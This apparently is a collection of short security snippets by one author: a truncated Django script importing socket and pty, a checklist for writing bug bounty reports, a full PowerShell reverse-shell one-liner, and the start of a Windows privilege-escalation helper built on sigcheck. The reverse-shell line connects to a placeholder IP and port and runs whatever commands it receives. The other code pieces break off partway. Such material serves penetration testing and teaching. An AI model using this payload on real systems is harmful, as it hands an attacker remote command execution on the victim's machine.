riyazwalikar

from distutils.log import error
import sys, socket,os,pty
from django.conf import settings
from django.urls import include, re_path
from django.http import HttpResponse

settings.configure(
    DEBUG=True,
    ROOT_URLCONF=__name__
)

riyazwalikar

How to write a good bug bounty report

1. Use simple words and avoid complex phrases. Use headings for your report sections.
2. Mention if authentication is required to exploit the issue.
3. If authentication is required, elaborate on the privilege required (admin, guest etc.), if applicable
4. Provide the URL where exploit payload is consumed and the parameter/header component which is affected
5. Include HTTP request, responses for multi step bugs
6. Steps to reproduce the issue should ideally have been written from the point of a user/attacker of the system.
7. In the Steps to reproduce, avoid jumping directly to the URL/parameter being exploited. Don't do 1. Go to http://example.com/api/v1/something/23/, 2. Change 23 to -1. This will not provide context to the reader.
8. If possible mention what you think the expected output should be and what you see instead

riyazwalikar

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

riyazwalikar

# Usage: findelevate.py C:\Windows\System32\
# Needs sigcheck.exe in path [https://technet.microsoft.com/en-us/sysinternals/bb897441.aspx]

import sys
import os
import glob
import subprocess

if len(sys.argv) < 2:
	print "Usage: findelevate.py <PATH>"